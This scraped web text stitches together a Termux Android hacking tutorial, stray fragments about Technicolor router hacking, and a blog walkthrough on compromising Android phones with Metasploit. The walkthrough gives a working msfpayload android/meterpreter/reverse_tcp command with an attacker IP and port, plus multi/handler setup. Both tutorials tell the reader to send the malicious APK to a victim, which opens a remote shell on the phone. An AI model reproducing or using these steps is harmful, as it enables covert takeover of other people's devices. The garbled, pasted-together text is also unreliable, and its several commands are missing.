If you want to immerse yourself more about how to hack with Android, then Termux is a very good “App” to use an discover. I have been using it for a long time and I still love to see what you can do with it! And that with or without root privileges.
Because the possibilities with Termux are almost unlimited, I would not be able to cover everything in this article, but I will try my level best to provide you a good start.
Worldwide wiki for Homeware hacking guides and resources. Most of Technicolor Gateways run customized firmware implementing ISP-specific integrations and get locked down in functionality to match service requirements. This kind of sucks because if you decide to use this device with a different ISP, you are likely to be blocked from doing that. Yes, you can block someone from using your technicolor router by doing the following:. Picking a really good router admin password, and. Picking a good wifi password or disabling wifi, and. Locking wifi access down (if its still enabled) to an.
Termux is a terminal emulator for Android with a Linuxenvironment. A minimal base system is installed automatically and additional packages are available using the apt and dpkg package management, similar to Debian or Ubuntu.
Termux is only available on Android 5.0 or later
Features Termux Application
- Secure
- Customizable
- Ready to Scale Up
- Programming
Technicolor Router Password
Termux has some Extra features
- Termux API
- Termux Boot
- Termux Float
- Termux Styling
- Termux Task
- Termux Widget
Rooting your Mobile Phone
There are so many types of Phones. All have a different way to root them. Also be aware that if you root your phone, you always have to be sure of whatever you do / download.“If you’re not familiar with Android’s tools and how to fix issues with a command line, you probably shouldn’t dive into rooting your phone. Root a phone can be a lot of fun to play around with, but it can also lead to plenty of frustration as you try to fix errors caused by overzealous modding.”Have fun But stay aware of the risks :-D
INSTALL TERMUX
DOWNLOAD Termux
Open the Termux App in the Google Play Store https://play.google.com/store/apps/details?id=com.termux and click on download. After the Termux App is installed, you first have to do an update and an upgrade exactly like in a normal Linux system.
INSTALLING PACKAGES FROM APT REPOSITORY
In Termux it is recommended to use package manager pkg which is a wrapper for apt. It simplifies installing or upgrading packages by automatically updating apt lists so you don’t have to type apt update when installing or upgrading packages.
For myself, I always use the apt instead of pkg a kind of getting used to it. Here in this article, I would give a good example using pkg, but as you can see on the pictures, I am using on my side apt
For more information about available commands, you can either just run pkg without arguments or using help argument:
Warning
If you prefer to use apt over pkg - never run it as root as you will mess up file permissions and SELinux contexts so you won’t be able to use it as a normal user.
As you see above, Termux looks exactly like a Terminal in Linux and you can compare Termux with a minimal Linux Installation where you can install everything yourself and set up the way you like it.
Just like with Linux you can use the help function in Termux
Or install man for the manual pages
List all packages
PYTHON AND PIP
Termux has completely switched to python3. Python2 no longer has support. But you can still install python 2 scripts. How to install python2 on Termux, I show this below. Pip packages are now automatically installed with python.
PYTHON 3 AND PIP 3
Termux has completely switched to python3. This is the command to use.
PYTHON 2 AND PIP 2 TERMUX
For some scripts you still need python 2, this is how you install it. It is now not necessary to install pip 2, this is automatically included.
SOME TEXT EDITORS
Storage Settings
To grant storage permissions in Android go to Settings > Apps > Termux > Permissions and select storage, then run termux-setup-storage in Termux.
To access shared and external storage you need to run
You will then be prompted to “Allow Termux access photos, media, and files on your device”, which you should allow. Executing termux-setup-storage ensures that permission to shared storage is granted to Termux when running on Android 6.0 or later. That an app-private folder on external storage is created (if external storage exists).
INSTALL METASPLOIT FRAMEWORK
The world’s most used penetration testing framework.
Use the following commands to install the package (only for Android 7 or higher):
If your device running Android OS versions 5.x.x-6.x.x, use these commands instead (unstable-repo is not available for legacy installations):
Installation may take long time since additional Ruby gems will be installed. Do not close Termux sessions until installation finishes to avoid introducing of potential inconsistencies in $PREFIX.
Warning
Do not manually upgrade Metasploit installed through the package with editing contents of $PREFIX/opt/metasploit. This will likely break installation and result in dependency problems. Do not report issues if you did this.
To start simply type:
Use Metasploit
Wlan’s Inet is the IP address your connection is currently using. To know your Wlan’s inet open a new session and type ifconfig and copy the inet of the Wlan and paste it into your payload (after LHOST=). Go to your file manager then find your payload name{test.apk} then send it to your victim.
The following step is to run metasploit-framework type this commands
If the target is downloading the payload, you will see the meterpreter session starting. As usual with the “help” function you can see all the available commands.
INSTALL UBUNTU ON ANDROID
Ubuntu chroot for Termux. This chroot provides the latest Ubuntu version (19.04 Disco Dingo). But before you use it, you need to install Wget and PRoot to install Ubuntu chroot in Termux.
After you install Wget and PRoot, you can install Ubuntu chroot using this command:
Or:
After Ubuntu chroot downloaded, you can run it by executing ./start-ubuntu.sh. If you are already inside your $HOME directory, you can run it with this command:
After installing the Ubuntu environment, you have to un-minimize the setup run:
To turn on our Termux with some good pentest tool we will need first to install some primary packages as well, which will be required later.
W3MINSTALL
w3m is a text-based web browser as well as a pager-like more' or less'. With w3m you can browse web pages through a terminal emulator window (xterm, rxvt or something like that). Moreover, w3m can be used as a text formatting tool that typesets HTML into plain text.
To exit press ctrl + z
SLINSTALL
You will see a moving train which you can control if the setup of Termux is running.
INSTALL TOP
“top” command allows you to see all the running processes. Type –help for more info / Type -q to quite the program.
FIGLET INSTALL
Usage
CMATRIX INSTALL
With this awesome terminal, you can really impress all your friends.
Install Toilet
Usage
INSTALL VARIOUS HACKING TOOLS ON TERMUX
Warning: There are a lot of “Termux Hacking Tutorials” on the Internet which provide suspicious software meant to be used as hacking tools. Most of them are just clickbait and don’t actually work. Some of them force users to install malware on their devices.
Tools like aircrack-ng or tcpdump can be found in the Termux Root Packages repository. But remember that Aircrack-ng requires wifi monitor mode which is not available in most devices.
INSTALL NMAP
Utility for Network Discovery, Security Scanner, Port Scanner, & Network Exploration Tool.
Usage
INSTALL HYDRA
Technicolor Router Hacker Using Android App
Hydra is one of the best password cracking and brute-forcing tool. It supports different services like telnet, ssh, ftp, etc. More information can be found in the official GitHub repository.
INSTALL SHODAN EYE ON TERMUX
Shodan Eye is a script I made in python. This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants, and everything in between. You can find everything using “your own” specified keywords.
A collection of search queries for Shodan has attached: “Shodan Dorks … The Internet of Sh*t” The information obtained with this tool can be applied in many areas, a small example: Network security, keep an eye on all devices in your company or at home that is confronted with the internet. Vulnerabilities. And so much more.
Shodan Eye can be installed and use very easy on Termux. This is a very big change, with old versions of Termux you had to make quite a few detours before you could install Shodan Eye. I have tested a lot, and it runs really well on Termux as well..!
Usage
You will be asked for a Shodan API key
Here in this article, you can read more about and the use of the Shodan Eye. Also, more info to find about the APK key that is needed. (Free)
Shodan Eye Ethical Hacking Tool Release
Install Dorks Eye on Termux
Dorks Eye can also be used in Termux ..!
Dorks Eye is a script I made in python 3. With this tool, you can easily find Google Dorks. Dork Eye collects potentially vulnerable web pages and applications on the Internet or other awesome info that is picked up by Google’s search bots. You can save the output in a file so that you can view it at a later time. You can determine the number of searches yourself. The number of websites to display
Dorks Eye Google Hacking Dork Scraping and Searching Script
Usage Termux
Video Android Hacking with Termux | Dorks Eye Google Dork Script
Become a member on Odysee.com
Earning on Odysee for watching videos ♥️
Here an invitation link, so that we both benefit.
In this way, you also support my work.
INSTALLING GITHUB “HACKING TOOLS” ON YOUR TERMUX
There are a number of GitHub tools available. Please note, if your Android phone is not rooted then some of these tools will not work. In this article, we did not talk about rooting on a mobile phone. Maybe we will come back to this later in another article.
INSTALL LAZYMUX
Lazymux tools installer is very easy to use, only provided for lazy Termux users.
Install Toolx
Tool-X is a Kali Linux Tool installer. In the Tool-X there are 250+ hacking tools available for Termux. You can install any tool by a single click. Tool-X is specially made for Termux and GNURoot Debian Terminal. Tool-X is also available for Ubuntu.
Or:
Usage
WANT TO SUPPORT THE WEBSITE
Dear people, I do a lot of things on the Internet and I do it all for free. If I don’t get enough to support myself, it becomes very difficult to maintain my web presence, which takes a lot of time, and the server costs also have to be paid.Your support is greatly appreciated.
Thanks guys ..!
Use the link above to donate via PayPal.
IMPORTANT THINGS TO REMEMBER
✓ This Video and Article is made for educational purposes and pentest only.
* You will not misuse the information to gain unauthorized access.
✓ This information shall only be used to expand knowledge and not for causing malicious or damaging attacks…!
Read also the Disclaimer
All the techniques provided in the tutorials on HackingPassion.com, are meant for educational purposes only.
If you are using any of those techniques for illegal purposes, HackingPassion.com can’t be held responsible for possible lawful consequences.
My goal is to educate people and increase awareness by exposing methods used by real black-hat hackers and show how to secure systems from these hackers.
Finally
If you have any questions about this article, any feedback, suggestions if you want to share your thoughts, contact me. Please feel free to do so.
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution 🙂 ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
Share this post if you found it useful 🙂
Share this article if you found it was useful:
Blogger at hacking-tutorial.com.
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com